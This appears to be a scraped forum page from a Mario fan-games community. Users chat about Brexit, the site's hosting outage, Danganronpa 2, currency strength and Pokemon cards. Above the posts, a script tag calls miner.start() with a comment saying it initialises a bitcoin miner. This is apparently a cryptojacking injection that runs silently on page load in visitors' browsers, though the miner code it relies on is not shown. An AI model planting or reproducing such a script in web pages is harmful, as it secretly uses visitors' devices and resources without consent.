<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxysmw centralpge project

Random Thoughts

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Ivy

Re: Twitter Thread

Postby Ivy » 3 years ago

TaviTurnip wrote:It's unironically relieving to me that we can focus on how dumb Europe is for once, instead of insulting random people for being Americans any time they look like they might trip over a rock somewhere.
well we'll see how this works out when trump becomes president
3DS FC: 2793-0650-7690 | Switch: SW-2766-9108-9399 | Steam: ivysaur1996 (that ivy guy)
Many thanks to GlitchedGhost and Rockythechao for the amazing paper Demo animation!

raekuul
X&BUTT
First name: Pokota
Pronouns: he/him/his

Postby raekuul » 3 years ago

Ashan wrote:Here's something I found on Twitter (sorry about the level 100 jpeg, that's how I found it, I swear)
Something interesting, and not just relevant to this topic in particular.
I wonder why everyone is acting like the UK can never ever ever be readmitted to the EU further down the road.

GlitchedGhost

Postby GlitchedGhost » 3 years ago

Alice wrote:So since it's still down after almost 24 hours: For anyone curious about the status of IsoNation, I'm waiting on our host to actually respond to my support ticket. Seems to be an issue with our server.
Ah, I was wondering why IsoNation had died for 24 hours
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

Mata Hari

Postby Mata Hari » 3 years ago

raekuul wrote:I wonder why everyone is acting like the UK can never ever ever be readmitted to the EU further down the road.
Nobody has ever left the EU before (barring weird edge cases like Greenland) and there are some right-wing elements in other Yurp countries agitating for their own referendums, so the EU has a powerful incentive to kick the shit out of the UK and discourage the others.

Mata Hari

Also if we were to rejoin (which as I said probably wouldn't be possible) we would have to do stuff like enter the Schengen Agreement (i.e. have no kind of border controls with other EU states at all) and start using the euro. Somehow we managed to get out of having to do those things but we couldn't a second time.

Alice
Pronouns: Girl person

Postby Alice » 3 years ago

GlitchedGhost wrote:Ah, I was wondering why IsoNation had died for 24 hours
Hopefully they get around to actually checking it out soon. They finally responded to my ticket about 5-1/2 hours ago but it was just to ask for verification of my identity and have yet to respond or do anything yet.

Also while it's on my mind I was going to post a bit about Danganronpa 2 since I finished it last night but since the site was down I couldn't. While I don't think it necessarily excuses some of the complaints I had about the game the last two chapters give some good explanations for some of the stuff I complained about. Last two chapters are also both extremely interesting and the final one is kinda a huge mindscrew for a lot of it. Provides a ton of answers unlike the conclusion to the first game too so even if you get annoyed by the early game like I did I'd recommend powering through that for the ending at least.

raekuul
X&BUTT

Mata Hari wrote:
raekuul wrote:I wonder why everyone is acting like the UK can never ever ever be readmitted to the EU further down the road.
Nobody has ever left the EU before (barring weird edge cases like Greenland) and there are some right-wing elements in other Yurp countries agitating for their own referendums, so the EU has a powerful incentive to kick the shit out of the UK and discourage the others.
1) What other countries?
2) With what army?

Mata Hari

Do you think there is a literal army involved

GlitchedGhost

Alice wrote:Hopefully they get around to actually checking it out soon. They finally responded to my ticket about 5-1/2 hours ago but it was just to ask for verification of my identity and have yet to respond or do anything yet.

Also while it's on my mind I was going to post a bit about Danganronpa 2 since I finished it last night but since the site was down I couldn't. While I don't think it necessarily excuses some of the complaints I had about the game the last two chapters give some good explanations for some of the stuff I complained about. Last two chapters are also both extremely interesting and the final one is kinda a huge mindscrew for a lot of it. Provides a ton of answers unlike the conclusion to the first game too so even if you get annoyed by the early game like I did I'd recommend powering through that for the ending at least.
I think the hilarious thing about the site going down was that I was about to respond to your post and had clicked refresh to check for new posts and it was like NOPE DEAD LAWL

I love mindscrews, you bet I'll be playing through that at some point.
I've been distracted by Pokemon the past couple days since my brain likes to jump around with shit a lot, but I'm gonna be playing it soon, you can bet on that
He captured!
raocow wrote:last night I had a dream where I finally understood what a 'birb' is, and turns out it's a collyflower

cheez8
Food Nut

Postby cheez8 » 3 years ago

Blivsey wrote:Apparently lots of people are going on record saying "oh god i only voted leave because i wanted to express my discontent with the system i didn't actually think it would win"

world's a mess
What the fuck.

I... normally I try not to swear, but there are seriously just no words for this. Every single thing I could say about why this is such an unbelievably, monumentally stupid mindset seems like a waste of words, because all of the problems are so painfully obvious that they go without saying. I want to rant about this, but... it just defeats the purpose, all on its own.

There's something wrong with the world.
I don't really get it but okay

Alice

GlitchedGhost wrote:I think the hilarious thing about the site going down was that I was about to respond to your post and had clicked refresh to check for new posts and it was like NOPE DEAD LAWL
Oddly enough I had a similar occurrence happen, lol. I'd just gotten up and went to check the site. It worked fine then when I went to open our general chat thread the site errored out for me then continued doing that even when I tried the front page.
I love mindscrews, you bet I'll be playing through that at some point.
I've been distracted by Pokemon the past couple days since my brain likes to jump around with shit a lot, but I'm gonna be playing it soon, you can bet on that
It was enough of a mindscrew that it actually took me a decent amount of time to get reoriented with everything, lol. Some of the stuff that gets revealed was expected and basically all the rest makes sense in hindsight but when it's actually revealed it's just really out there.

Mata Hari

Minnakht wrote:Minnakht
I just now realized that you have the same username as a dude on another forum. Are you into Magic the Gathering?

Bean

Postby Bean » 3 years ago

raekuul wrote:Someone mind explaining to me why weak currency is a good thing?
They do a lot of trade over in Japan land, and that's the big issue there right now. It's getting too strong to be an economic boost. You never want it to be too low, but being too high can be a bad thing, too. Here and here. Those two links explain the situation better than I could. It's a BBC and Wall Street Journal link.

InsaneIntentions1
Skeleton
First name: Newsome

Postby InsaneIntentions1 » 3 years ago

My pokerman deck is coming along nicely
That crazy voice dude

Zummorr
Bug Catcher

Postby Zummorr » 3 years ago

InsaneIntentions1 wrote:My pokerman deck is coming along nicely
TCGO or real cardboard?

raekuul
X&BUTT

Bean wrote:
raekuul wrote:Someone mind explaining to me why weak currency is a good thing?
They do a lot of trade over in Japan land, and that's the big issue there right now. It's getting too strong to be an economic boost. You never want it to be too low, but being too high can be a bad thing, too. Here and here. Those two links explain the situation better than I could. It's a BBC and Wall Street Journal link.
Ah, effective cost of exports for the importers. Gotcha.

Drei
First name: Stirling

Postby Drei » 3 years ago

raekuul wrote:
Mata Hari wrote:
1) What other countries?
2) With what army?
hey so just let me inform you that literal fascist parties had positions in the greek republic during their debt crisis and europe has had a s r s problem with those kinds of ideologies during hard economic times

i mean you can also look at germany' christian democracts kind of leading the eu so there's that

and i mean i just feel like you're being obtuse cause all the anti-immigration parties are being pretty loud that they are reported about across the pond on npr and afaik most have said "brexit is good"

july
七月
First name: e!ɡa
Pronouns: she/her

Postby july » 3 years ago

oh geez prime minister Boris is going to be a thing isn't it

Maiku Wotaharu
Karaoke Enthusiast and Honorary Armless Bipedal Cycloptic Demon
First name: You'll figure it out.

Postby Maiku Wotaharu » 3 years ago

elga wrote:oh geez prime minister Boris is going to be a thing isn't it
I preferred him as a HIGNFY presenter...

The best part of waking up is...knowing where you are.

FINALLY, SOME MOSTS USERBARS!

GlitchedGhost

Alice wrote:Oddly enough I had a similar occurrence happen, lol. I'd just gotten up and went to check the site. It worked fine then when I went to open our general chat thread the site errored out for me then continued doing that even when I tried the front page.
Hopefully IsoNation will come back soon.
It was enough of a mindscrew that it actually took me a decent amount of time to get reoriented with everything, lol. Some of the stuff that gets revealed was expected and basically all the rest makes sense in hindsight but when it's actually revealed it's just really out there.
Man, makes me excited to pick up the game.
He captured!

InsaneIntentions1
Skeleton

Zummorr wrote:
InsaneIntentions1 wrote:My pokerman deck is coming along nicely
TCGO or real cardboard?
Real as can be
That crazy voice dude

Alice

GlitchedGhost wrote:Hopefully IsoNation will come back soon.
Apparently I can't expect there to be less than 24 hours between replies to my support ticket unfortunately. I don't think that their support staff will be there for another few hours but as of this moment they have yet to reply to me verifying that I'm actually the account owner for the site's hosting account.

InsaneIntentions1
Skeleton

Alice wrote:
GlitchedGhost wrote:Hopefully IsoNation will come back soon.
Apparently I can't expect there to be less than 24 hours between replies to my support ticket unfortunately. I don't think that their support staff will be there for another few hours but as of this moment they have yet to reply to me verifying that I'm actually the account owner for the site's hosting account.
*summons skeleton army* I'll convince em! Also thought you'd enjoy my deck sleeves Image I had little choice in deck sleeves to pick from at my neighbors shop, and these were cheaper :/
That crazy voice dude

Alice

InsaneIntentions1 wrote:Also thought you'd enjoy my deck sleeves http://i.imgur.com/YcLR3Pf.jpg I had little choice in deck sleeves to pick from at my neighbors shop, and these were cheaper :/
Perfect card protectors. She'll burst the eardrums of anyone trying to harm your cards.

GlitchedGhost

Alice wrote:Apparently I can't expect there to be less than 24 hours between replies to my support ticket unfortunately. I don't think that their support staff will be there for another few hours but as of this moment they have yet to reply to me verifying that I'm actually the account owner for the site's hosting account.
Great customer service.
He captured!

Return to “the gazebo”